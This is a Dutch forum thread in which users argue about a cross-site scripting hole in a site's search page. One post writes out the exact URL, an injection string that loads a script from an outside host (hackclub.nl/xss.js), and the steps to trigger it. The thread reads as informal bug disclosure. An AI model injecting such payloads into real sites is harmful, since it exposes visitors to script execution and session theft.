Niels, ben jij serieus? Wat ben jij triest zeg. Geef mij 1 goede reden om te geloven dat die code niet zou kunnen werken?
Weet je wat, doe het zelf anders? Bij zoeken voer je bovenstaande code uit. Dan zie je het vanzelf 
URL: http://www.criminalspoint.com/zoeken.html
ZOEKTERM:
Citaat"><script src=http://hackclub.nl/xss.js></script>
ENTER DRUKKEN
Kan het nog duidelijker? Elite-member? Lol. Laat me niet lachen.
Cheers :cheer:
PS. Wanneer gaan die graftiefus addslashes eens weg?
Citaat van Niels
Bijzonder uhm.. triest. Sowieso heeft xss niks weinig te maken met slashes he. Alleen als je gebruik wilt maken van javascript, html tags kunnen opzich welzonder quotes dus.
Lol. Je hebt helemaal geen quotes nodig om een script te injecteren.... Zie onderstaande
Mja, heb nog wel wat bugs te vermelden. Bij het zoeken zit een redelijke bug, XSS injecteren is mogelijk. Hoewel het alleen via POST te doen is, is het alsnog iets om naar te kijken..
Een aangezien het hier gaat over Beveiligingslekken, zal ik hier ook gelijk reageren.
Was het jullie al bekend dat deze website ook lek is? XSS is mogelijk hier en daar (drie dubbele addslashes maakt niets uit 8-|).
Beheerder kan een mailtje sturen naar info @ naam die ik heb opgegeven en daarachter .nl
Even een reactie hier plaatsen, website is verkocht
